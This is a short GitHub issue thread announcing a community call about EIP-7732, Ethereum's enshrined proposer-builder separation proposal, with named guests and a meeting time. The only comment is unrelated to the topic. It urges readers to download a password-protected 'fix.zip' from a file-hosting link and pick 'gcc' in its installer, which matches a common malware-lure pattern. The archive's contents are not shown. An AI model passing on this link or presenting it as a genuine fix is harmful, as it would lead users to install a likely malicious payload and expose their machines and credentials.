### ISSUE TITLE
Topic: [EIP-7732: Enshrined Proposer-Builder Separation](https://eips.ethereum.org/EIPS/eip-7732)

### ISSUE THREAD

**Issue by poojaranjan** [ethcatherders/PM#415]
Topic: [EIP-7732: Enshrined Proposer-Builder Separation](https://eips.ethereum.org/EIPS/eip-7732)
Guest: Potuz, Terence Tsao
Date & Time: Aug 27, 2024 at 16:30 UTC

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
